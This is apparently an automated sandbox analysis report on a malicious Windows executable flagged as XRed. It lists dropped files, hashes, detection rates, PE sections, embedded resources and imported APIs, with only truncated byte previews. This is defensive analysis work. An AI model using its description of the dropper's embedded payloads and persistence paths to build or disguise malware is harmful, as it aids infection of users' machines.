                                                                                                                            SHA1:CA92F3FACC7403E687EF35543A9B1AB55B6C7791
                                                                                                                            SHA-256:FDADEB31300C334235210A0FAB0762C87CE92EB430B9CEE114F933D209C747B4
                                                                                                                            SHA-512:C90B8D5819B9DBCB229A864F07C64FC98D38F8EE23CE146BF23198DC19FEABF0CB8BD05CE927D85C74D39FDC6F98CA2DBA70A2A43D42E43AEDDD33AAA33B6A2C
                                                                                                                            Malicious:false
                                                                                                                            Preview:L..................F.@.. ...n/...Z......Z......Z............................:..DG..Yr?.D..U..k0.&...&.......$..S.....~.Z..=8...Z......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.S...........................^.A.p.p.D.a.t.a...B.V.1......Y.R..Roaming.@......EW<2.Y.R..../......................9*.R.o.a.m.i.n.g.....V.1......Y.S..Windata.@......Y.S.Y.S..........................*...W.i.n.d.a.t.a.....`.2......Y.S .YOABSG.exe..F......Y.S.Y.S.......................... '..Y.O.A.B.S.G...e.x.e.......c...............-.......b...........p.Y=.....C:\Users\user\AppData\Roaming\Windata\YOABSG.exe..!.....\.....\.....\.....\.....\.W.i.n.d.a.t.a.\.Y.O.A.B.S.G...e.x.e.,.".C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.i.n.d.a.t.a.\."...C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.s.h.e.l.l.3.2...d.l.l.........%SystemRoot%\SysWOW64\shell32.dll......................................................................................................

                                                                                                                            C:\Users\user\AppData\Roaming\Windata\YOABSG.exe

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\Desktop\._cache_AYRASY.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):978432
                                                                                                                            Entropy (8bit):7.878129877710586
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24576:ChloDX0XOf4btEYBiYZh/gRrrAFmqrMHisAMED:ChloJfEEaiSgCkqoHis
                                                                                                                            MD5:8E44132C27ADC94100C8D8BE5D4AD041
                                                                                                                            SHA1:8F6D3501AEE4CA56051FBCD4D4258DCAB9BF8AA1
                                                                                                                            SHA-256:7E9FF2F8DB8A740FB31A969B90AA86A4D11BBD919233AC2A9D676FC82B426B94
                                                                                                                            SHA-512:A06DD554B16630570C4F25D2C540E297233A201C9233977A5B06664B7659AA8CBAEAD38FAB88841C8ADCAA5F09F7E23297E92B7D9529CA0D3B2DA5E860C4584B
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 47%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L...p!mg.........."......P........... .......0....@........................... ...........@...@.......@.....................T. .$....0..T...................x. ......................................"..H...........................................UPX0....................................UPX1.....P.......D..................@....rsrc........0.......H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....

                                                                                                                            C:\Users\user\Desktop\._cache_AYRASY.exe

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\Desktop\AYRASY.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):978432
                                                                                                                            Entropy (8bit):7.878129877710586
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24576:ChloDX0XOf4btEYBiYZh/gRrrAFmqrMHisAMED:ChloJfEEaiSgCkqoHis
                                                                                                                            MD5:8E44132C27ADC94100C8D8BE5D4AD041
                                                                                                                            SHA1:8F6D3501AEE4CA56051FBCD4D4258DCAB9BF8AA1
                                                                                                                            SHA-256:7E9FF2F8DB8A740FB31A969B90AA86A4D11BBD919233AC2A9D676FC82B426B94
                                                                                                                            SHA-512:A06DD554B16630570C4F25D2C540E297233A201C9233977A5B06664B7659AA8CBAEAD38FAB88841C8ADCAA5F09F7E23297E92B7D9529CA0D3B2DA5E860C4584B
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 47%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L...p!mg.........."......P........... .......0....@........................... ...........@...@.......@.....................T. .$....0..T...................x. ......................................"..H...........................................UPX0....................................UPX1.....P.......D..................@....rsrc........0.......H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....

                                                                                                                            C:\Users\user\Documents\GAOBCVIQIJ\PWCCAWLGRE.xlsm

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:Microsoft Excel 2007+
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):18387
                                                                                                                            Entropy (8bit):7.523057953697544
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                            MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                            SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                            SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                            SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                                                            C:\Users\user\Documents\GAOBCVIQIJ\~$PWCCAWLGRE.xlsx

                                                                                                                            Download File
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):165
                                                                                                                            Entropy (8bit):1.610853976637159
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:iXFQLjLlAWFd:97
                                                                                                                            MD5:CA2C2DB316A89F044206082EEB3A366E
                                                                                                                            SHA1:B1B7DFF94B991B26093AA29BF3793DDE245412E1
                                                                                                                            SHA-256:12393F1035745AD02C149920E37AFFE459CD0448A2AFEE25C1FABA8060758FF7
                                                                                                                            SHA-512:66BC8C779431737A3FA00AF7697C299BC473B6FD22D48914986821DA7C0AB90554D32F7F2B471EAB5410F9C0DE7E076F4D6DEDDCCE1948818F7781DAE9EDEBE7
                                                                                                                            Malicious:false
                                                                                                                            Preview:.user ..e.n.g.i.n.e.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                            C:\Users\user\Documents\GAOBCVIQIJ\~$cache1

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):771584
                                                                                                                            Entropy (8bit):6.639994041359131
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9Igr:ansJ39LyjbJkQFMhmC+6GD9j
                                                                                                                            MD5:27C056CC4DAFB6B3161272E800C85E55
                                                                                                                            SHA1:3CF48608E3C73115E37316A49F47D3586C5C94E1
                                                                                                                            SHA-256:8445CFA3304BBC48A8616AABA0881A2433E52B839DD5E6234DF8776AE7873C26
                                                                                                                            SHA-512:0D0A77C959BA38555E49C1ECDB5530A8D0D2C0D4BCF4B7BF91A82854D82ED139F0737C9024979F148B67AA2287B087F585B0F9B69F931733B4BDE32D491FECB7
                                                                                                                            Malicious:true
                                                                                                                            Yara Hits:
                                                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\GAOBCVIQIJ\~$cache1, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\GAOBCVIQIJ\~$cache1, Author: Joe Security
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 100%
                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                                                            C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1835008
                                                                                                                            Entropy (8bit):4.46869223690105
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:RzZfpi6ceLPx9skLmb0fyZWSP3aJG8nAgeiJRMMhA2zX4WABluuNZjDH5S:JZHtyZWOKnMM6bFpLj4
                                                                                                                            MD5:277437B46D696BA79E86946A70540328
                                                                                                                            SHA1:9BED295C9068323FC091518C89F5FEDD6B66958B
                                                                                                                            SHA-256:38070B616DB7B52D4925242EE4AC818DF45EA8CDFFD55B2948950E806A8754F6
                                                                                                                            SHA-512:E67F97DC1F5456F50A3C83BFBF295B9801BF2FEFD2B55E2249B0910DE6A3BFDDDD931B57867CB84961296BFDD10AD893740057D7CE5E04C64E40DE546EE407B0
                                                                                                                            Malicious:false
                                                                                                                            Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.....Z.................................................................................................................................................................................................................................................................................................................................................5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                            Static File Info

                                                                                                                            General

                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Entropy (8bit):7.48957166237222
                                                                                                                            TrID:
                                                                                                                            • Win32 Executable (generic) a (10002005/4) 93.09%
                                                                                                                            • Win32 Executable Borland Delphi 7 (665061/41) 6.19%
                                                                                                                            • UPX compressed Win32 Executable (30571/9) 0.28%
                                                                                                                            • Win32 EXE Yoda's Crypter (26571/9) 0.25%
                                                                                                                            • Win32 Executable Delphi generic (14689/80) 0.14%
                                                                                                                            File name:AYRASY.exe
                                                                                                                            File size:1'750'016 bytes
                                                                                                                            MD5:07e25c260c13b82cd867daef02255c82
                                                                                                                            SHA1:ebc6562d3eb2a877d8cfeafcada1e1af1a66e208
                                                                                                                            SHA256:72d043dcd766da3f32477c3c1612165b2124f347013bbb69ba3da85eaf9e3d40
                                                                                                                            SHA512:dcf874250b8b302fff6ba5466b240660d06613838bc24ff76ab8f060ad8fb6ddbdfd58548034d08ab43906dd4b0f91a3ad2f31fe298dc20005f8a0a48873afd9
                                                                                                                            SSDEEP:49152:jnsHyjtk2MYC5GDIhloJfEEaiSgCkqoHisJ:jnsmtk2athlVER3CkqoHxJ
                                                                                                                            TLSH:E485D032F6D1A477D1321A3D9C5BA3A8482DBF512D34794E3BF82E5C9F7A28129142D3
                                                                                                                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                            File Icon

                                                                                                                            Icon Hash:170105b232472f1f

                                                                                                                            Static PE Info

                                                                                                                            General

                                                                                                                            Entrypoint:0x49ab80
                                                                                                                            Entrypoint Section:CODE
                                                                                                                            Digitally signed:false
                                                                                                                            Imagebase:0x400000
                                                                                                                            Subsystem:windows gui
                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                            DLL Characteristics:
                                                                                                                            Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                            TLS Callbacks:
                                                                                                                            CLR (.Net) Version:
                                                                                                                            OS Version Major:4
                                                                                                                            OS Version Minor:0
                                                                                                                            File Version Major:4
                                                                                                                            File Version Minor:0
                                                                                                                            Subsystem Version Major:4
                                                                                                                            Subsystem Version Minor:0
                                                                                                                            Import Hash:332f7ce65ead0adfb3d35147033aabe9

                                                                                                                            Entrypoint Preview

                                                                                                                            Instruction
                                                                                                                            push ebp
                                                                                                                            mov ebp, esp
                                                                                                                            add esp, FFFFFFF0h
                                                                                                                            mov eax, 0049A778h
                                                                                                                            call 00007F2828A708BDh
                                                                                                                            mov eax, dword ptr [0049DBCCh]
                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                            call 00007F2828AC4205h
                                                                                                                            mov eax, dword ptr [0049DBCCh]
                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                            mov edx, 0049ABE0h
                                                                                                                            call 00007F2828AC3E04h
                                                                                                                            mov ecx, dword ptr [0049DBDCh]
                                                                                                                            mov eax, dword ptr [0049DBCCh]
                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                            mov edx, dword ptr [00496590h]
                                                                                                                            call 00007F2828AC41F4h
                                                                                                                            mov eax, dword ptr [0049DBCCh]
                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                            call 00007F2828AC4268h
                                                                                                                            call 00007F2828A6E39Bh
                                                                                                                            add byte ptr [eax], al

                                                                                                                            Data Directories

                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xa00000x2a42.idata
                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xb00000x100b30.rsrc
                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xa50000xa980.reloc
                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0xa40180x21.rdata
                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0xa40000x18.rdata
                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                            Sections

                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                            CODE0x10000x99bec0x99c0033fbe30e8a64654287edd1bf05ae7c8cFalse0.5141641260162602data6.572957870355296IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                            DATA0x9b0000x2e540x30001f5e19e7d20c1d128443d738ac7bc610False0.453125data4.854620797809023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                            BSS0x9e0000x11e50x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                            .idata0xa00000x2a420x2c0021ff53180b390dc06e3a1adf0e57a073False0.3537819602272727data4.919333216027082IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                            .tls0xa30000x100x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                            .rdata0xa40000x390x200a92cf494c617731a527994013429ad97False0.119140625MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "J"0.7846201577093705IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                            .reloc0xa50000xa9800xaa00dcd1b1c3f3d28d444920211170d1e8e6False0.5899816176470588data6.674124985579511IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                            .rsrc0xb00000x100b300x100c00694ea87e8264448e1db3a3657c5b4e19False0.8911432342380721data7.79577397473991IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                                                                            Resources

                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                            RT_CURSOR0xb0dc80x134Targa image data - Map 64 x 65536 x 1 +32 "\001"0.38636363636363635
                                                                                                                            RT_CURSOR0xb0efc0x134data0.4642857142857143
                                                                                                                            RT_CURSOR0xb10300x134data0.4805194805194805
                                                                                                                            RT_CURSOR0xb11640x134data0.38311688311688313
                                                                                                                            RT_CURSOR0xb12980x134data0.36038961038961037
                                                                                                                            RT_CURSOR0xb13cc0x134data0.4090909090909091
                                                                                                                            RT_CURSOR0xb15000x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"0.4967532467532468
                                                                                                                            RT_BITMAP0xb16340x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                                                            RT_BITMAP0xb18040x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 3800.46487603305785125
                                                                                                                            RT_BITMAP0xb19e80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                                                            RT_BITMAP0xb1bb80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39870689655172414
                                                                                                                            RT_BITMAP0xb1d880x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.4245689655172414
                                                                                                                            RT_BITMAP0xb1f580x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5021551724137931
                                                                                                                            RT_BITMAP0xb21280x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5064655172413793
                                                                                                                            RT_BITMAP0xb22f80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                                                            RT_BITMAP0xb24c80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5344827586206896
                                                                                                                            RT_BITMAP0xb26980x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                                                            RT_BITMAP0xb28680xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.4870689655172414
                                                                                                                            RT_ICON0xb29500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.5145403377110694
                                                                                                                            RT_ICON0xb39f80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 8192TurkishTurkey0.2101313320825516
                                                                                                                            RT_DIALOG0xb4aa00x52data0.7682926829268293
                                                                                                                            RT_STRING0xb4af40x358data0.3796728971962617
                                                                                                                            RT_STRING0xb4e4c0x428data0.37406015037593987
                                                                                                                            RT_STRING0xb52740x3a4data0.40879828326180256
                                                                                                                            RT_STRING0xb56180x3bcdata0.33472803347280333
                                                                                                                            RT_STRING0xb59d40x2d4data0.4654696132596685
                                                                                                                            RT_STRING0xb5ca80x334data0.42804878048780487
                                                                                                                            RT_STRING0xb5fdc0x42cdata0.42602996254681647
                                                                                                                            RT_STRING0xb64080x1f0data0.4213709677419355
                                                                                                                            RT_STRING0xb65f80x1c0data0.44419642857142855
                                                                                                                            RT_STRING0xb67b80xdcdata0.6
                                                                                                                            RT_STRING0xb68940x320data0.45125
                                                                                                                            RT_STRING0xb6bb40xd8data0.5879629629629629
                                                                                                                            RT_STRING0xb6c8c0x118data0.5678571428571428
                                                                                                                            RT_STRING0xb6da40x268data0.4707792207792208
                                                                                                                            RT_STRING0xb700c0x3f8data0.37598425196850394
                                                                                                                            RT_STRING0xb74040x378data0.41103603603603606
                                                                                                                            RT_STRING0xb777c0x380data0.35379464285714285
                                                                                                                            RT_STRING0xb7afc0x374data0.4061085972850679
                                                                                                                            RT_STRING0xb7e700xe0data0.5535714285714286
                                                                                                                            RT_STRING0xb7f500xbcdata0.526595744680851
                                                                                                                            RT_STRING0xb800c0x368data0.40940366972477066
                                                                                                                            RT_STRING0xb83740x3fcdata0.34901960784313724
                                                                                                                            RT_STRING0xb87700x2fcdata0.36649214659685864
                                                                                                                            RT_STRING0xb8a6c0x354data0.31572769953051644
                                                                                                                            RT_RCDATA0xb8dc00x44data0.8676470588235294
                                                                                                                            RT_RCDATA0xb8e040x10data1.5
                                                                                                                            RT_RCDATA0xb8e140xeee00PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed0.9195641597985348
                                                                                                                            RT_RCDATA0x1a7c140x3ASCII text, with no line terminatorsTurkishTurkey3.6666666666666665
                                                                                                                            RT_RCDATA0x1a7c180x3c00PE32 executable (DLL) (GUI) Intel 80386, for MS WindowsTurkishTurkey0.54296875
                                                                                                                            RT_RCDATA0x1ab8180x64cdata0.5998759305210918
                                                                                                                            RT_RCDATA0x1abe640x153Delphi compiled form 'TFormVir'0.7522123893805309
                                                                                                                            RT_RCDATA0x1abfb80x47d3Microsoft Excel 2007+TurkishTurkey0.8675150921846957
                                                                                                                            RT_GROUP_CURSOR0x1b078c0x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                                            RT_GROUP_CURSOR0x1b07a00x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                                            RT_GROUP_CURSOR0x1b07b40x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                            RT_GROUP_CURSOR0x1b07c80x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                            RT_GROUP_CURSOR0x1b07dc0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                            RT_GROUP_CURSOR0x1b07f00x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                            RT_GROUP_CURSOR0x1b08040x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                            RT_GROUP_ICON0x1b08180x14dataTurkishTurkey1.1
                                                                                                                            RT_VERSION0x1b082c0x304dataTurkishTurkey0.42875647668393785

                                                                                                                            Imports

                                                                                                                            DLLImport
                                                                                                                            kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                                                                                                                            user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                                                                                                            advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                                            oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                            kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                                            advapi32.dllRegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegNotifyChangeKeyValue, RegFlushKey, RegDeleteValueA, RegCreateKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, GetUserNameA, AdjustTokenPrivileges
                                                                                                                            kernel32.dlllstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, WaitForMultipleObjects, VirtualQuery, VirtualAlloc, UpdateResourceA, UnmapViewOfFile, TerminateProcess, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetFileAttributesA, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryA, ReadFile, OpenProcess, OpenMutexA, MultiByteToWideChar, MulDiv, MoveFileA, MapViewOfFile, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadLocale, GetTempPathA, GetTempFileNameA, GetSystemInfo, GetSystemDirectoryA, GetStringTypeExA, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLogicalDrives, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeThread, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, EndUpdateResourceA, DeleteFileA, DeleteCriticalSection, CreateThread, CreateProcessA, CreatePipe, CreateMutexA, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CloseHandle, BeginUpdateResourceA
                                                                                                                            version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                                                            gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
